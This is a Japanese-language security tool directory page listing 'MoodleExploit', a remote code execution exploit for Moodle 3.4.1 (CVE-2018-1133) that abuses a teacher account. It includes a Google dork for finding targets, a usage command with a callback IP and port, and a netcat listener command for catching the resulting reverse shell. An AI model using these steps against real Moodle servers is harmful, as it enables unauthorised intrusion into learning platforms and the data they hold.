Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
MoodleExploit — Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133 | Kitploit
ツール/GitHubGitHub/darrynten/moodleexploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubdarrynten/moodleexploit

MoodleExploit

Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133

リポジトリを見る
10527年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Moodle エクスプロイト

  • Exploit Title: Moodle v3.4.1 RCE エクスプロイト
  • Google Dork: inurl:"/course/jumpto.php?jump="
  • 日付: 2019年3月15日
  • 作成者: Darryn Ten
  • Vendor Homepage: https://moodle.org
  • Software Link: https://github.com/moodle/moodle/archive/v3.4.1.zip
  • バージョン: 3.4.1 (おそらく < 3.5.0 さらには 3.x も対象)
  • テスト環境: Linux (Moodle v3.4.1)
  • CVE : CVE-2018-1133

教師ロールを持つユーザーが任意のコードを実行できます。

使用方法

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1

root@kitploit:~
user       The account username
pass       The password to the account
ip         Callback IP
port       Callback Port
course     Valid course ID belonging to the teacher

このスクリプトを実行する前に、指定されたポートでnetcatリスナーを実行していることを確認してください。

nc -lnvp 1010

これにより、リスニング中のIPとポートへのリバースシェルを開こうとします。

注意事項

このエクスプロイトは、Robin Peraglie氏が提供した情報に基づいています。

参考資料: https://blog.ripstech.com/2018/moodle-remote-code-execution

ツールをダウンロード